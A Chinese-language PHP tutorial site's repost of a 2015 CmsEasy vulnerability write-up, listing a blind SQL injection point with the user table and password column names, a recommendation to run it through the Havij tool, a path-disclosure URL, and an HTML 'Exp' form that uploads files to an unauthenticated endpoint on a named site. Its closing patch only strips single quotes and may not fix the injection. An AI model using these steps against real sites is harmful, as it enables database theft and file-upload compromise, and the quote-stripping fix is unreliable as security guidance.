网站地图    收藏   

主页 > 后端 > 网站安全 >

cmseasy(易通CMS) 注入漏洞 上传漏洞 爆路径ODAY(含修

来源:自学PHP网    时间:2015-04-17 12:00 作者: 阅读:

[导读] 注入漏洞注入点:/celive/js/include.php?cmseasylive=1111departmentid=0类型:mysql blindstring错误关键字:online.gif表名:cmseasy_user列明:userid,username,password直接放Havij里面跑。错误关键字:......

注入漏洞
 
注入点:/celive/js/include.php?cmseasylive=1111&departmentid=0
类型:mysql blind—string
错误关键字:online.gif
表名:cmseasy_user
列明:userid,username,password
直接放Havij里面跑。错误关键字:online.gif 添加表名:cmseasy_user 列表:userid,username,password 关键字:Powered by CmsEasy
 
 
 
暴路径ODAY
 
直接把爆路径 如:http://www.2cto.com /index.php?case=archive
 
上传漏洞
 
Exp:
 
<form enctype=”multipart/form-data” method=”post” action=”http://www.8090sec.com/celive/live/doajaxfileupload.php”>
<input type=”file” name=”fileToUpload”>
<input type=”submit”value=”上传”>
</form>
 
注入漏洞修复:
 
打开/celive/js/include.php 文件,来到52行或此功能代码处
 
if (isset($_GET['departmentid'])) {
$departmentid = $_GET['departmentid'];
$activity_sql = “SELECT `id` FROM `”.$config['prefix'].”activity` WHERE `departmentid`=’”.$departmentid.”‘ AND `operatorid`=’”.$operatorid.”‘”;
将代码改为
if (isset($_GET['departmentid'])) {
$departmentid = str_replace(“‘”,”",$_GET['departmentid']);
$activity_sql = “SELECT `id` FROM `”.$config['prefix'].”activity` WHERE `departmentid`=’”.$departmentid.”‘ AND `operatorid`=’”.$operatorid.”‘”;

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论